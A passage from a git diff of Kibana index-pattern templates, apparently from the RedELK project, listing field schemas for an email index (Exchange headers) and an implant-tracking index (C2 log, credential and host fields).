":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-recordreviewcfmtype\"}}},{\"name\":\"x-ms-exchange-organization-scl\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-scl.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-scl\"}}},{\"name\":\"x-ms-exchange-processed-by-bccfoldering\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-processed-by-bccfoldering.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-processed-by-bccfoldering\"}}},{\"name\":\"x-ms-exchange-senderadcheck\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-senderadcheck.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-senderadcheck\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheaderspromoted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheaderspromoted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheaderspromoted\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstamped\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstamped.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheadersstamped\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstripped\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstripped.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheadersstripped\"}}},{\"name\":\"x-ms-exchange-transport-endtoendlatency\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-endtoendlatency.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-endtoendlatency\"}}},{\"name\":\"x-ms-exchange-transport-forked\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-forked.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-forked\"}}},{\"name\":\"x-ms-has-attach\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-has-attach.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-has-attach\"}}},{\"name\":\"x-ms-office365-filtering-correlation-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-office365-filtering-correlation-id-prvs\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-office365-filtering-correlation-id-prvs.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-office365-filtering-correlation-id-prvs\"}}},{\"name\":\"x-ms-office365-filtering-correlation-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-office365-filtering-correlation-id\"}}},{\"name\":\"x-ms-oob-tlc-oobclassifiers\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-oob-tlc-oobclassifiers.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-oob-tlc-oobclassifiers\"}}},{\"name\":\"x-ms-publictraffictype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-publictraffictype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-publictraffictype\"}}},{\"name\":\"x-ms-tnef-correlator\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-tnef-correlator.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-tnef-correlator\"}}},{\"name\":\"x-ms-traffictypediagnostic\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-traffictypediagnostic.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-traffictypediagnostic\"}}},{\"name\":\"x-ms-userlastlogontime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-userlastlogontime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-userlastlogontime\"}}},{\"name\":\"x-msametadata\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-msametadata.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-msametadata\"}}},{\"name\":\"x-msapipeline\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-msapipeline.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-msapipeline\"}}},{\"name\":\"x-notifications\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-notifications.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-notifications\"}}},{\"name\":\"x-originating-ip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-originating-ip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-originating-ip\"}}},{\"name\":\"x-originatororg\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-originatororg.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-originatororg\"}}},{\"name\":\"x-received\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-received.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-received\"}}},{\"name\":\"x-sender-ip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sender-ip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sender-ip\"}}},{\"name\":\"x-sid-pra\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sid-pra.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sid-pra\"}}},{\"name\":\"x-sid-result\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sid-result.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sid-result\"}}}]", "timeFieldName": "@timestamp", "title": "email-*"}, "coreMigrationVersion": "7.16.3", "id": "email", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171860673, 15], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_implantsdb.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_implantsdb.ndjson index 985df54b..a1f1a36d 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_implantsdb.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_implantsdb.ndjson @@ -1 +1 @@ -{"attributes": {"fieldFormatMap": "{\"implantlogfile\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"{{rawValue}}\"}}}", "fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.log.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.message\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.program\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.timestamp\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"creds.credential\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.host\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.realm\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.username\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.stack_trace.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"error.stack_trace\"}}},{\"count\":0,\"name\":\"error.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.ingested\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory_local\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path\"}}},{\"count\":0,\"name\":\"file.path_local\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path_local.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path_local\"}}},{\"count\":0,\"name\":\"file.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain_ext\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.as.organization.number\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip_ext\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip_int\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.build\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.codename\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.full\"}}},{\"count\"